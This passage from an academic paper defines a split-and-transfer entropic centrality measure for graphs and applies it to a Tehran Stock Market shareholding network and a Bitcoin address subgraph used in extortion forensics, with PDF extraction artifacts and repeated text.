example, we could choose all edges175 with equal weight, that is ωx(u,v) = fu i for every (u,v) in x containing i edges, to instantiate the special176 case where the flow is uniformly split among all edges.177 For a given node u, we compute the expected flow from u to a chosen neighbor v. Every such choice of x comes with a probability q(x), and every edge (u,v) in x has a weight ωx(u,v), which sums up to fuv = ∑ x∈Eu,v q(x)ωx(u,v), (2) where Eu,v contains the sets in Eu themselves containing v.178 Example 1. Consider the running example, with u = v1. The set of neighbors of u is Nu = {u,v2,v3,v4}.179 We assign the following probabilities: q({u}) = q1, q({v2}) = q2, q({v3}) = q3, q({v4}) = q4, q({u,v2}) =180 q5, q({u,v3}) = q6, q({u,v4}) = q7, q({v2,v3}) = q8, q({v2,v4}) = q9, q({v3,v4}) = q10, q({u,v2,v3}) =181 q11, q({u,v2,v4}) = q12, q({u,v3,v4}) = q13, q({v2,v3,v4}) = q14, q({u,v2,v3,v4}) = q15, with ∑15i=1 qi =182 1. We write down explicitly the terms involved in the sum (2) for two nodes, v2 and v3:183 fu,v2 = q2 fu + q5ω{u,v2}(u,v2)+ q8ω{v2,v3}(u,v2)+ q9ω{v2,v4}(u,v2)+ q11ω{u,v2,v3}(u,v2) +q12ω{u,v2,v4}(u,v2)+ q14ω{v2,v3,v4}(u,v2)+ q15ω{u,v2,v3,v4}(u,v2). fu,v3 = q3 fu + q6ω{u,v3}(u,v3)+ q8ω{v2,v3}(u,v3)+ q10ω{v3,v4}(u,v3)+ q11ω{u,v2,v3}(u,v3)+ q13ω{u,v3,v4}(u,v3)+ q14ω{v2,v3,v4}(u,v3)+ q15ω{u,v2,v3,v4}(u,v3). 5/14 PeerJ Comput. Sci. reviewing PDF | (CS-2018:12:33449:4:0:NEW 13 Aug 2019) Manuscript to be reviewedComputer Science Figure 3 An example of split-and-transfer entropic centrality: on (A) in red, the event corresponding to choosing {v2,v3}, in (B), the event {v3,v4}. The probabilities pu,v are computed by summing over both events, weighted by the respective event probability: pv1,v2 = 1 3 ( 2 3 )= 2 9 , pv1,v4 = 2 3 ( 3 8 )= 1 4 , pv1,v3 = 1 3 ( 1 6 )+ 2 3 ( 1 8 ), pv1,v5 = 1 3 ( 1 6 )+ 2 3 ( 1 8 + 3 8 ). This gives CH (v1)≈1.9076. Full-size DOI: 10.7717/peerjcs.220/fig-3 On the left, when probabilities are uniform, since now only two outgoing edges of v4 are available, namely edges (v4,v4) and (v4,v5), each is assigned a probability of 1 2. On the right, when probabilities are not uniform, we distribute the probability of going to some visited vertex proportionally to the rest of the available edges. Since 46 is going to v5 while 1 6 is staying at v4, we have 4 and 1 out of 5 respectively leaving and staying, thus obtaining the renormalized probabilities as 46 + 4 5 1 6 = 4 5 and 1 6 + 1 5 1 6 = 1 5. The examples of Figs. 1 and 2 illustrate diverse cases of indivisible flow. By definition of indivisibility, the choice of an edge at a vertex u corresponds to choosing subsets containing one vertex only in the list of all subsets of neighbors. We can thus set a probability 0 to all subsets which contain more than one vertex. Therefore, the definition of entropic centrality in (1), with or without uniform edge probabilities, are particular cases of the proposed split-and-transfer framework, that we discuss next. The split-and-transfer entropic centrality Consider the network of Fig. 3 depicting a seller v1 whose direct customers are v2,v3,v4. Say we further know that when v1 distributes a new batch of items, he does so to either customers {v2,v3} or {v3,v4}, and in fact, the pair {v3,v4} is preferred (they receive 2/3 of the batches, versus 1/3 for the group {v2,v3}). Furthermore, in the first case, v2 receives a higher volume than v3 (say 2/3 of the batch goes to v2), while for the second case, v4 takes 3/4 of the batch shared with v3. Once v3,v4 obtain the items, they typically keep half for themselves, and distribute the other half to v5. To compute the centrality of v1, we consider a divisible flow starting at u=v1 which can split among different paths instead of following one. To model the choice of splitting among possible neighbors, we first define a probability q(x) over the set Eu ={{v1}, {v2}, {v3}, {v4}, {v1,v2}, {v1,v3}, {v1,v4}, {v2,v3}, {v2,v4}, {v3,v4}, {v1,v2,v3}, {v1,v2,v4}, {v1,v3,v4}, {v2,v3,v4}, {v1,v2,v3,v4}} such that, for our example, q({v2,v3})= 1 3, q({v3,v4})= 2 3, and Oggier et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.220 6/21 https://peerj.com https://doi.org/10.7717/peerjcs.220/fig-3 http://dx.doi.org/10.7717/peerj-cs.220 q(x)=0 for other choices of x (in contrast to Oggier, Silivanxay & Datta (2018) where it was chosen to be uniformly at random). This represents the fact that 1/3 of the time, v1 sends the goods to the pair {v2,v3} (as shown in Fig. 3A), while for the rest of the time, it sends it to the pair {v3,v4} (shown in Fig. 3B). We compute the path probabilities for each event, for q({v2,v3})= 1 3 and for q({v3,v4})= 2 3 accordingly. We have further information: when v1 deals with {v2,v3}, there is a bias of 2 3 for v2 compared to 13 for v3, and the bias is of 3 4 for v4 in the other case. The corresponding probabilities are attached to the edges {(v1,v2),(v1,v3)} and {(v1,v3),(v1,v4)} respectively (shown in Fig. 3C). Now that the edge probabilities are defined, we can compute the path probabilities. For example, from v1 to v5, we sum up the path probabilities for both events, weighted by the respective event probability: 13( 1 6)+ 2 3( 1 8 + 3 8). We next provide a general formula. We let a flow start at a vertex whose centrality we wish to compute, and at some point of the propagation process, a part fu of the flow reaches u. Let Nu be the neighborhood of interest given fu, that is, the set of outgoing neighbors which have not yet been visited by the flow. Every outgoing edge (u,v) of u exactly corresponds to some outgoing neighbor v, so in what follows, we may refer to either one or the other. Let Eu denote the set of possible outgoing edge subsets (where every edge (u,v) is represented by v the neighbor). We attach a possibly distinct probability q(x) to every choice x in Eu. Then ∑ x∈Euq(x)=1. Every x in Eu corresponds to a set of edges (u,v) for v a neighbor. We further attach a weight ωx(u,v) to every edge in x, with the constraint that ∑ (u,v)∈xωx(u,v)= fu. For example, we could choose all edges with equal weight, that is ωx(u,v)= fu i for every (u,v) in x containing i edges, to instantiate the special case where the flow is uniformly split among all edges. For a given node u, we compute the expected flow from u to a chosen neighbor v. Every such choice of x comes with a probability q(x), and every edge (u,v) in x has a weight ωx(u,v), which sums up to fuv = ∑ x∈Eu,v q(x)ωx(u,v), (2) where Eu,v contains the sets in Eu themselves containing v. Example 1 Consider the running example, with u=v1. The set of neighbors of u is Nu ={u,v2,v3,v4}. We assign the following probabilities: q({u})=q1, q({v2})=q2, q({v3})=q3, q({v4})=q4, q({u,v2})=q5, q({u,v3})=q6, q({u,v4})=q7, q({v2,v3})=q8, q({v2,v4})=q9, q({v3,v4})=q10, q({u,v2,v3})=q11, q({u,v2,v4})=q12, q({u,v3,v4})=q13, q({v2,v3,v4})=q14, q({u,v2,v3,v4})=q15, with ∑15 i=1qi =1. We write down explicitly the terms involved in the sum (2) for two nodes, v2 and v3: fu,v2 =q2fu+q5ω{u,v2}(u,v2)+q8ω{v2,v3}(u,v2)+q9ω{v2,v4}(u,v2)+q11ω{u,v2,v3}(u,v2) +q12ω{u,v2,v4}(u,v2)+q14ω{v2,v3,v4}(u,v2)+q15ω{u,v2,v3,v4}(u,v2). fu,v3 =q3fu+q6ω{u,v3}(u,v3)+q8ω{v2,v3}(u,v3)+q10ω{v3,v4}(u,v3) +q11ω{u,v2,v3}(u,v3)+q13ω{u,v3,v4}(u,v3)+q14ω{v2,v3,v4}(u,v3)+q15ω{u,v2,v3,v4}(u,v3). Oggier et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.220 7/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.220 Then fu,u+fu,v2 +fu,v3 +fu,v4 = fu ∑15 i=1qi = fu. By setting q8 = 1 3 and ω{v2,v3}(u,v2)= fu 2 3, we find fu,v2 = fu 2 9. Also, adding up q10 = 2 3 and ω{v2,v3}(u,v3)= fu 1 3, ω{v3,v4}(u,v3)= fu 1 4, we find fu,v3 = fu 1 9 + fu 1 6 = fu 5 18. Similarly fu,v4 = fu 1 2 and indeed fu 2 9 + fu 5 18 + fu 1 2 = fu. We repeat the computations for fv3,v5 and fv4,v5. For that, we need to know what is fv3 and fv4, but in this case, since both v3 and v4 only have one incoming edge, we have that fv3 = fv1,v3 and fv4 = fv1,v4: fv3,v5 = 1 2fv3 = fu 1 2 5 18,fv4,v5 = 1 2fv4 = fu 1 2 1 2,fv5 = fv3,v5+fv4,v5 = fu 7 18. It is true that by setting fu =1, we have fu,v2 = 2 9 =pu,v2 as computed in Fig. 3, but this is true because pv2,v2 =1. If we consider v3 instead, we find fu,v3 = 5 18 =2pu,v3, this is because we have computed what reaches v3, but since v3 has an outgoing edge, we need to distinguish what stays from what continues. Notice that by setting fu=1 and fv3 = fv4 =1, we get fu,v2 = 2 9,fu,v3 = 5 18,fu,v4 = 1 2,fv3,v5 = 1 2,fv4,v5 = 1 2. We then assign to edge (vi,vj) the probability fvi,vj (with fu=1) as reported on Fig. 3A. The property of flow conservation observed in the example holds true in general, which we shall prove next. Indeed, when v varies in Nu, the sets Eu,v appearing in the summation ∑ v∈Nu ∑ x∈Eu,v q(x)ωx(u,v) may intersect, so for each choice x, one can gather all the Eu,v that contains x. For this x, we find a term in the above sum of the form q(x) ∑ (u,v)∈xωx(u,v)=q(x)fu. Then∑ v∈Nu ∑ x∈Eu,v q(x)ωx(u,v)= ∑ x∈Eu q(x)fu= fu. This shows that the flow from u to v is conserved over all the neighbors v ∈Nu given fu. Thus, by setting fu=1, the quantity fuv = ∑ x∈Eu,v q(x)ωx(u,v) becomes a probability, and in fact, putting this probability on the edge (u,v) in the context of the transfer entropic centrality gives the same result as the above computations using the split-and-transfer model, as in fact already illustrated on the figure in Example 1, since the probabilities displayed on the edges of the graph have been computed in this manner. We summarized what we computed in the proposition below. Proposition 1 The split-and-transfer entropic centrality CH,p(u) of a vertex u is given by CH,p(u)=− ∑ v∈V quvlog2(quv) where quv = ∑ x∈Eu,v q(x)ωx(u,v) is computed from (2) with fu = 1 and the usual convention that 0· log20=0 is assumed. The index p in CH,p emphasizes the dependency on the choice of the probability distribution p. Then we have CH,unif when p is uniform as a particular case. Oggier et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.220 8/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.220 1We thank the authors of Dastkhan & Gharneh (2016) for sharing their data with us. We thus showed that the split-and-transfer entropic centrality is equivalent to a transfer entropic centrality, assuming the suitable computation of edge probabilities. The notion of split-and-transfer entropic centrality characterizes the spread of a flow starting at u through the graph. Now two vertices may have the same spread, but one vertex may be dealing with an amount of goods much larger than the other. In order to capture the scale of a flow, we also propose a scaled version of the above entropy. Definition 1 The scaled split-and-transfer entropic centrality is accordingly given by F(fu)CH,p(u) where F is a scaling function. As a corollary, the computational complexity of this centrality measure is the same as that of Tutzauer (2007), namely that of a depth first search, i.e., O(|V |+|E|) (Migliore, Martorana & Sciortino, 1990). When the graph becomes large and some probability become negligible, a natural heuristic of setting them to 0 is used. The scaling function F may depend on the nature of the underlying real world phenomenon being modeled by the graph, with F(fu)= fu being a simple default possible choice (other standard choices are F(fu)= √ fu or F(fu)= log(fu)). We use the default choice in the example below. Example 2 Continuing with the same example, we use the edge probabilities as obtained in Example 1 to compute the transfer entropic centrality from Definition 1. The scaled entropic centralities of u= v1 and v3 are simply fuCH,p(v1)≈ fu1.9076 and fv3CH,p(v3)= fv3( 1 2log2(2)+ 1 2log2(2))= fv3. Without the scaling factor, CH,p is a measure of spread, and it makes sense that CH,p(v1)>CH,p(v3). However if v1 is actually distributing some items in overall small amounts, while v3 is not only getting this item from v1 but also producing it and furthermore sending it only to v5 but in large amounts, then the scaling factor could be used to refine the analysis and account for this extra information. From the moment fv3 ≥1.9076fv1, v3 will be deemed more important than v1 as per the scaled entropic centrality measure. CASE STUDIES Shareholding in Tehran Stock Market We next consider 131 companies from the Tehran Stock Market, as listed in Appendix A of Dastkhan & Gharneh (2016).1 They form the vertices of a cross-shareholding network of companies which have shares of other companies. There is an edge between i and j if company i belongs to the investment portfolio of company j, i.e., j owns some share of i. Therefore the in-degree of node j is the number of companies that belong to the investment portfolio of company j. Conversely, the out-degree of node j is the number of companies that are shareholders of j. Edges are weighted, edge (i,j) has for weight the percentage of shares that company j has from company i. We will consider this graph, shown in Fig. 4, and the graph with reverse edge directionality. Nodes highlighted in green in Fig. 4 have one edge with weight more than 0.5, meaning that more than 50% of their shares are owned by another company, otherwise they are in grey. Nodes highlighted in vermillion, superseding the other coloring, have the highest in-degrees, which means that they own shares of many other companies. They are nodes Oggier et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.220 9/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.220 Figure 4 Cross-shareholding network of Tehran Stock Market companies: Vermillion and sky blue nodes have respectively the highest in- and out-degrees. Nodes circled in sky blue respectively vermillion have the highest entropic centrality under the current and reverse edge directionality. Full-size DOI: 10.7717/peerjcs.220/fig-4 121 (Adashare), 85 (NIKX1), 123 (Oilcopen), 42 (SA3A1), 119 (tamin org), and 118 (government). Nodes highlighted in sky blue have the highest out-degrees, which means that their shares are owned by many other companies (but possibly in small amounts). They are nodes 110 (BMEX1), 2 (CH12), 21 (FO041), 41 (GD021), 3 (GO02) with degree 7 and 69 (PFAX1), 1 (MADN), 20 (MS022) and 62 (PK061) with degree 8. We next assign probabilities to edges: we use the edge weight, and fix the edge probability to be inversely proportional to its weight. Self-loops have a natural interpretation. Since the outgoing edges of node j indicate the companies that are shareholders of j, the self-loop refers to j still owning some of its own shares, and the amount is 100% minus what the other companies own (share ownerships with negligible amounts were not taken into account in the data set, so self-loops absorb these portions). Table 1 lists the seven nodes with the highest entropic centrality. The interpretation of entropic centrality here is that we are looking at the nodes whose shares are ‘‘most diversely owned’’ in terms of their shares being owned by different companies, whose shares are in turn themselves owned by others. The economic fortunes of the company whose centrality is looked at thus also affects those of the other companies, and the entropic centrality thus indicates the impact a particular company’s economic performance would have on the rest. We immediately see that this centrality measure is different from out-degree Oggier et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.220 10/21 https://peerj.com https://doi.org/10.7717/peerjcs.220/fig-4 http://dx.doi.org/10.7717/peerj-cs.220 Table 1 Vertices with the highest entropic centrality, their scaled entropic centrality, where fu is the market size in percentage (their relative ranking is marked with subscript), their out-degrees (in the above part) or in-degrees (in the below part, for the graph with reverse edge direc- tionality) and neighbors with the weight of the connecting edges. Bold face indicates a high degree. Ranks with respect to alpha/Katz (AK) with α=1, PageRank (PR) weighted (W) and unweighted (U), and betweenness (B). no ID CH,p fu fuCH,p Out Neighbors A/K PR(U/W) B (W) 23 ARFZ1 3.1990 0.7153 2.28823 6 (1, 0.181), (2, 0.353), 1/1 1/1 39 (5, 0.045), (43, 0.045) (41, 0.05), (85, 0.04) 3 GO02 3.0205 0.9635 2.91031 7 (1, 0.224),(21, 0.099) 3/3 69/69 3 (82, 0.011),(7, 0.037) (42, 0.028), (43, 0.377) (121, 0.185) 109 IPAR1 2.9680 0.6874 2.04026 5 (96, 0.2),(101, 0.0963) 22/22 7/4 39 (123, 0.173), (97, 0.078), (38, 0.139) 59 PRDS1 2.9541 0.7951 2.34884 5 (88, 0.011), (57, 0.668), 14/14 18/26 39 (118, 0.054), (55, 0.05) (82, 0.011) 65 PK3A1 2.8857 0.6267 1.80847 2 (57, 0.42), (55, 0.206) 71/71 30/12 39 5 KNRX 2.8817 0.9415 2.71312 3 (1, 0.8876),(3, 0.0209) 26/23 67/37 31 (83, 0.033) 116 PRSX1 2.8273 0.8086 2.28615 6 (96, 0.648), (97, 0.049) 8/7 12/9 39 (88, 0.071), (41, 0.011) (129, 0.01), (79, 0.017) no ID CH,p fu in Neighbors 118 gov 5.3434 9.8 40 (85,0.1737) 119 tamin org 4.6989 5.7647 31 (42, 0.0305) 121 Adashare 4.4777 6.7827 17 88 BTEJ1 4.2916 0.7143 9 (85, 0.474) 123 Oilcopen 3.9154 3.5699 22 83 TMEL1 3.8099 0.4849 9 85 NIKX1 3.7693 0.9722 17 centrality. We can however look at how they relate, by considering the role of out-degrees not only on the nodes but also on their neighbors. We observe that only node 3 has one of the highest out-degrees, however, nodes 23 and 116 still have high out-degrees, but also are connected to neighbors which have high out-degrees, in fact, node 23 which has the highest entropic centrality has three high out-degree neighbors. For nodes 109 and 59, they still have a relatively high out-degree. For 5, it has a fairly low out-degree, but out of the 3 neighbors, two have high degrees themselves. The case of node 65 is particularly interesting, since it has only two neighbors, namely 55 and 57. Neither of 55 nor 57 has a high centrality individually, but they together provide node 65 a conduit to a larger Oggier et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.220 11/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.220 subgraph than the individual transit nodes themselves do, illustrating the secondary effects of flow propagation. The cross-shareholding network of Tehran Stock Market was analyzed in Dastkhan & Gharneh (2016), where a closeness centrality ranking is shown to be almost identical to the degree based centrality one. The entropic centrality ranking in contrast manages to capture a different dynamics, by involving the spread of influence via flow propagation, together with a quantitative edge differentiation. The above approaches ignore any other information such as the market size share of the organizations. Arguably, between two organizations with identical position in the graph, the one with larger market size may be deemed to have larger influence on the other nodes. This is modeled by the scaled entropic centrality CH(u)fu, where fu is the market size in percentage. We notice that this indeed creates a distinct relative ranking (indicated by subscript in Table 1, for example, ARFZ1 is ranked 3rd as per weighted entropic centrality). Particularly, among the top seven companies as per CH(u), we see that only PRDS1 continues to be in the same (fourth) rank. KNRX has the largest change in ranking, up from sixth to second. While the scaled entropic centrality ranking of the top two nodes are congruent with the ranking based solely on the scale factor (market size), we see that ARFZ1, which would be ranked 5th by market size, and first by solely network effect, is ranked 3rd when both factors are taken into account. We compare the entropic centrality CH,p with respect to the alpha, Katz and PageRank centralities (using the reverse edge direction). Note that the unweighted graph has for largest eigenvalue λ1 '2.99715780 (so 1 λ1 '0.3336494). The ranking results for the most central entities from the Tehran stock exchange, and the overall Kendall tau rank correlation coefficients Kendall (1938) are reported in Tables 1 and 2 respectively. The Kendall tau coefficient indicates the rank correlation among a pair or ranked lists (see Schoch, Valente & Brandes, 2017 for a discussion on why Kendall tau is preferred to Pearson). The entity 23 is outstandingly central with respect to all metrics but weighted betweenness. The alpha and Katz centralities yield very similar results, but they rank the entity 3 as third instead of second. They rank second the entity 20. A likely explanation could be that that 20 actually has a higher out-degree (and thus a higher in-degree in the reversed edge network) than entity 3. The top 7 most central entities have mostly a 0 betweenness (ranked 39), and are mostly ranked pretty low with respect to both versions of PageRank, weighted and unweighted. The most central entity for the weighted betweenness is 85, which is one of the most central with respect to in-degree (it has an in-degree of 18). Then 111 and 76 are second respectively for the unweighted and weighted PageRank. Entity 111 has out-neighbors 88,81,127,94,112 which become in-neighbors in the reversed edge graph, neither 111 itself nor its neighbors stand out by their degrees, however 76 has for in-neighbors in the reversed edge graph 72,73,130,85,118,76, and both 118 and 85 are very central with respect to in-degree, making it easier to explain why it is ranked high. Note that the assortativity coefficient of this graph is≈−0.01521584, so this is a non-assortative graph, where high degree nodes do not particularly connect to neither high nor low degree nodes. Oggier et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.220 12/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.220 Table 2 Kendall rank correlation coefficient τκ across the centralities for the Tehran stock exchange. CH,p Alpha PageRank (UW) PageRank (W) Katz (α = 0.1) α = 0.85 α = 0.85 (α = 0.1) CH,p 0 0.2259 0.3185 0.3326 0.2252 alpha 0.2259 0 0.3171 0.3787 0.0047 PageRank(UW) 0.3185 0.3171 0 0.1317 0.316 PageRank(W) 0.3326 0.3787 0.1317 0 0.3778 Katz 0.2252 0.0047 0.316 0.3778 0 The Kendall rank correlation confirms that the entropic centrality differs from the other metrics not only to decide the most central vertices but also overall. The Kendall coefficient for unweighted betweenness has not been reported since only 38 vertices have a non-zero betweenness. This shows that the graph considered is far from being strongly connected. Overall, comparison points illustrate that the entropic centrality CH,p provides a new perspective not captured by the other algorithms. We next consider the same graph but where edge directionality is reversed. A node becomes central if it owns diverse companies, which themselves may in turn own various companies. Since owning shares could be used to influence an organization’s management, the entropic centrality based on reverse edges is thus a proxy indicator of how much control a specific entity has over the other entities in the market. Organizations with very high entropic centralities using either sense of edge direction could then be seen as probable candidates causing structural risks—be it by being ‘too big to fail’, or having too much control over significant portions of the market for it to be fairly competitive. The nodes with highest entropic centrality are shown in Table 1. The most important one is the government: we expect it to be one of the most important players in Iran when it comes to owning shares in other companies (and yet not to appear in the list when the original edge direction is considered). We see a higher correlation between entropic centrality and in-degree than there was between entropic centrality and out-degree in Table 1. Among the seven most central nodes, five of them are having one of the highest in-degrees, the two most central nodes have themselves one high degree neighbor. Then node 88 has a fairly low in-degree, but it is connected to node 85. In summary, the case study of the Tehran stock exchange network exhibits three important intertwined aspects of our model. Firstly, it is flexible. It seamlessly captures the effect of relationships, considered either in a binary fashion (just the structure), or quantified with relative strengths (the skew in strength of the relationships), while it can also accommodate information which is intrinsic to the node but somewhat disentangled from the network (used as a scale factor). Second, reversing the edge direction gives a dual perspective. Finally, we see that we obtain different results and corresponding insights, based on which variations of the model is applied for a specific study. Naturally, figuring it out the best variation is done on a case-by-case basis. Oggier et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.220 13/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.220 Figure 5 A subgraph of the Bitcoin subgraph, which comprises only addresses that have non-zero en- tropic centrality. Those in red are listed in Table 3, with the highest entropic centrality. Full-size DOI: 10.7717/peerjcs.220/fig-5 A bitcoin subgraph Our final case study is a subgraph of the Bitcoin wallet address network derived from Bitcoin transaction logs (see Fig. 5). Bitcoin is a cryptocurrency (Nakamoto, 2008), and transactions (buy and sell) among users of this currency are stored and publicly available in a distributed ledger called blockchain. User identities are unknown, but each user has one or many wallet addresses, that are identifiers in every transaction. Then one transaction record amalgamates the wallet addresses of possibly several payers and payment receivers, together with the transaction amounts. To be more precise, consider two Bitcoin transactions T1 and T2. The transaction T1 has n inputs, from wallet addresses A1,...,An, of amounts i11,...,i1n respectively. The outputs, of amounts o11,...,o1m go to wallet addresses C1,...,Cm respectively. The sum of inputs equals the sum of outputs and any transaction fees (say τ1), i.e., |T1|= ∑n k=1i1k =τ1+ ∑m l=1o1l. For the sake of simplicity, we will ignore the transaction fees (i.e., consider τ1 =0). A similar setting holds for transaction T2, where the same wallet address A1 appears again as part of the inputs, together with some wallet addresses B2,...,Bn′ which may or not Oggier et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.220 14/21 https://peerj.com https://doi.org/10.7717/peerjcs.220/fig-5 http://dx.doi.org/10.7717/peerj-cs.220 Table 3 Addresses with highest entropic centrality in the Bitcoin subgraph above (with the respective relative ranks as per other centralities— alpha/Katz with α = 0.1 (AK), PageRank (PR), weighted (W) and unweighted (U)) and with highest centrality when edges have reverse direc- tionality below. Address CH,p fu Out fuCH AK PR (U/W) 3CD1QW6fjgTwKq3Pj97nty28WZAVkziNom 8.6633 0.0473 2807 652 1 1/1 38PjB1ghFrD9UQs7HV5n15Wt1i3mZP8Wke 5.7214 0.1961 382 481 3 14/14 3Eab4nDg6WJ5WR1uvWQirtMzWaA34RQk9s 5.4339 0.1778 568 514 2 13/15 3MYqQJ5LbDe9U3drsaDprKxWobVZA3UgAw 5.3316 0.9270 2 609 4 2/455 38mMQxz4knqfmecjLW3atdygfWxvvnJfg7 5.3316 0.9268 2 3 4 2/3 33XZf8Ys9sbqnAKynA4yBckyzwN3SEZaU7 5.3316 0.9254 2 9 4 2/10 3P4C7jpF1oxHgxqt4VgMRcCBEV3YEpaDUm 5.3316 0.9224 2 7 4 2/8 3Fp5ejYY8FsJ6Y3kb377VRjJunTeUVYsuq 5.3316 0.8966 2 2 4 2/3 3Q9SPyCN95szQUoQYgAHKgdhC3YnRsrFrW 5.3316 0.8928 2 8 4 2/8 38A6nGSMR59WHVnj9gaJ2Cm62y9kFE318i 5.3316 0.8908 2 5 4 2/6 3Ce7jUQn2RH5Ysdb4VvShoYymZLpkcqaAA 5.3316 0.8877 2 10 4 2/11 364qbSJFhwkBgZnMuhmUHdczpaZNS2PmE6 5.3316 0.8832 2 1 4 2/2 3KDgKr3qov4Ws5WPnaA2RHjcE1N2UeVYs3 5.3316 0.8619 2 4 4 2/5 1NxaBCFQwejSZbQfWcYNwgqML5wWoE3rK4 5.3316 0.1175 2 6 4 2/7 Address CH,p fu in 38PjB1ghFrD9UQs7HV5n15Wt1i3mZP8Wke 7.6477 171.359 218 3Eab4nDg6WJ5WR1uvWQirtMzWaA34RQk9s 7.5583 175.022 196 15hWpb3m5VXdn9KVsS4rSMnrQQJLhXVyN4 5.2649 7.504 17 1C7PDYzjRDqomyywDHEqx9huYoYQoGYgdV 4.9876 3.949 31 1zksVRSDUuX2E5mMNvvbA9C4esfnvVdfA 4.4176 0.494 2 intersect with A2,...,An. By design, Bitcoin transactions do not retain an association as to which specific inputs within a transaction are used to create specific outputs. Suppose one would like to create a derived address network from some extract of the Bitcoin logs of transactions, that is a graph whose nodes are Bitcoin wallet addresses, and edges are directed and weighted. There should be an edge from address u to address v if there is at least one transaction where some amount of Bitcoin is going from u to v. However as explained above, it is not always possible to disambiguate the input–output pairs. If the input amounts are particularly mutually distinct, and so are the output amounts, and there are input–output amounts that match closely, one might be able to make reasonable guess about matching a specific input to a specific output. In general, in absence of such particular information, one heuristic is to model the input–output association probabilistically. A common heuristic (Kondor et al., 2014) is to consider that based on transaction T1 there is an edge from A1 to each of C1,...,Cm. The same holds for transaction T2. Thus in the derived address network, there will be an edge from A1 to each of the C1,...,Cm,D1,...,Dm′. If some outputs X,...,Z are in common to both transaction outputs, there is a single edge between A1 and each of the addresses X,...,Z. The derived address network gives us the graph to be analyzed, whose vertices are wallet addresses and edges are built as above. Originally, a given wallet address is sending Oggier et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.220 15/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.220 Bitcoins to possibly different output wallet addresses within one transaction, and the same wallet address may be involved in different transactions, with possible reoccurences of the same output addresses (this is the case of A1 which is an input to both transactions T1 and T2 and X,...,Z appear as output transactions in both). In the split-and-transfer flow model, we can incorporate this information into the derived address network by assigning the probabilities q({C1,...,Cm})= i11 i11+i21 and q({D1,...,Dm′})= i21 i21+i22 with which the respective subsets {C1,...,Cm} and {D1,...,Dm′} of the set {C1,...,Cm,D1,...,Dm′} of neighbors of A1 are used. Other choices for q(x) are possible, the rationale for this specific choice is to use a probability that is proportional to the amount of Bitcoin injected by A1 in each of the transactions. Edge weights in the derived address network are computed as follows. Let |T1|= ∑m k=1o1k and |T2|= ∑m′ k=1o2k denote the total amounts involved in each of the transactions. For an edge between A1 and Cl, which happens in T1, it is ωC1,...,Cm(A1,Cl)= o1l |T1| , while for an edge between A1 and Dl, which happens in T2, it is ωD1,...,Dm′(A1,Dl)= o2l |T2| . We thus have m∑ l=1 ωC1,...,Cm(A1,Cl)= m∑ l=1 o1l |T1| =1, m′∑ l=1 ωD1,...,Dm′(A1,Dl)= m′∑ l=1 o2l |T2| =1. If some node pairs, and thus edges, repeat across transactions (for example, A1 to X,...,Z in our example), these edge weights should cumulate in the overall derived address network. This is captured by the formula (2) which is here instantiated as fA1,X =q({C1,...,Cm})ωC1,...,Cm(A1,X)+q({D1,...,Dm′})ωD1,...,Dm′(A1,X) = i11 i11+i21 o1x |T1| + i21 i11+i21 o2x |T2| where in transaction T1 the output to address X is o1x, while it is o2x in transaction T2. In a departure from previous works that derive the address network in a manner explained above Kondor et al. (2014), our graph model is able to retain the information that subsets of edges co-occur, or not, as displayed above. For that reason, the Bitcoin address network is a natural candidate (and in fact, part of the inspiration) for the general flow model with arbitrary splits and transfers as considered in this paper, where individual flows may go through a subset of outgoing edges. For our experiments, we choose a Bitcoin subgraph appearing in the investigation of wallet addresses involved in extorting victims of Ashley-Madison data breach (see Oggier, Phetsouvanh & Datta, 2018a for accessing the data). It is obtained by extracting a subgraph of radius 4 (if the graph were undirected) around the wallet address 1G52wBtL51GwkUdyJNYvMpiXtqaGkTLrMv. While we would like to emphasize that we use here this Bitcoin graph to explore the entropic centrality model, it may still be worth mentioning that one identified suspect node from another of our study (Phetsouvanh, Oggier & Datta, 2018), namely node 15hWpb3m5VXdn9KVsS4rSMnrQQJLhXVyN4, has high enough entropic centrality to be listed (see Table 3 below) as a top entropic centrality node. Thus, the entropic centrality analysis can be used as a tool to identify nodes of interest, and to create a shortlist of nodes to be investigated further in detail, in the context of Bitcoin forensics. Oggier et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.220 16/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.220 Table 4 Kendall rank correlation coefficient τκ across the centrality algorithms for the Bitcoin sub- graph dataset (excluding 3926 nodes which all had an entropic centrality score of zero). CH,p fuCH,p Alpha PageRank PageRank Katz (α = 0.1) (UW) (W) (α = 0.1) CH,p 0 0.2331 0.2359 0.3421 0.3956 0.2342 fuCH,p 0.2331 0 0.2135 0.3152 0.4337 0.2118 alpha 0.2359 0.2135 0 0.2652 0.4949 0.0032 PageRank(UW) 0.3421 0.3152 0.2652 0 0.4299 0.2652 PageRank(W) 0.3956 0.4337 0.4949 0.4299 0 0.4965 Katz 0.2342 0.2118 0.0032 0.2652 0.4965 0 Tables 3 and 4 compare the entropic centrality CH,p with other centralities. With respect to scaled entropic centrality, there is a large variation in the weightages associated with the edges, which has a significant impact on the relative rankings between scaled/unscaled entropic centralities. With respect to weighted betweenness, only three addresses are relevant, they are, with their respective in- and out-degree, 3Eab4nDg6WJ5WR1uvWQirtMzWaA34RQk9s (ranked 1, in-degree: 196, out-degree: 568), 38PjB1ghFrD9UQs7HV5n15Wt1i3mZP8Wke (ranked 2, in-degree: 218, out-degree: 382), and 3CD1QW6fjgTwKq3Pj97nty28WZAVkziNom (in-degree: 14, out-degree: 2807). The other addresses are ranked 69 (corresponding to a betweenness of 0). The graph has for largest eigenvalue λ1'7.1644140 and 1 